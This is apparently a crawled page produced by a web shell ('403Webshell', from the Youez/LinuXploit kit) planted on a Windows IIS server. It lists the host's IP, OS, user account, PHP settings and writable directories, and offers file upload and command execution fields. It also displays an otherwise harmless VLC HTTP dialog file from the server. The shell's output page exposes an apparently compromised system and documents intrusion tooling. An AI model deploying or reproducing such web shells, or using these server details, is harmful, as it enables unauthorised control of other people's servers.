403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.189
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/VideoLAN/VLC/lua/http/dialogs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files/VideoLAN/VLC/lua/http/dialogs/stream_config_window.html
<script type="text/javascript">
	$(function(){
		$('#window_stream_config').dialog({
			autoOpen: false,
			width:400,
			modal: true,
			buttons:{
				"<?vlc gettext("Okay") ?>":function(){
					$('#player').empty();
					$('#player').attr('href',$('#stream_protocol').val()+'://'+$('#stream_host').val()+':'+$('#stream_port').val()+'/'+$('#stream_file').val());
					flowplayer("player", "https://releases.flowplayer.org/swf/flowplayer-3.2.7.swf");
					$(this).dialog('close');
				},
				"<?vlc gettext("Cancel") ?>":function(){
					$(this).dialog('close');
				}
			}
		});
	})
</script>
<div id="window_stream_config" title="<?vlc gettext("Stream Input Configuration") ?>">
	<table>
		<tr>
			<td><?vlc gettext("Protocol") ?></td>
			<td><input type="text" name="stream_protocol" id="stream_protocol" value="http" /></td>
		</tr>
		<tr>
			<td><?vlc gettext("Host") ?></td>
			<td><input type="text" name="stream_host" id="stream_host" value="" /></td>
		</tr>
		<tr>
			<td><?vlc gettext("Port") ?></td>
			<td><input type="text" name="stream_port" id="stream_port" value="8081" /></td>
		</tr>
		<tr>
			<td><?vlc gettext("File") ?></td>
			<td><input type="text" name="stream_file" id="stream_file" value="stream.flv" /></td>
		</tr>
	</table>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit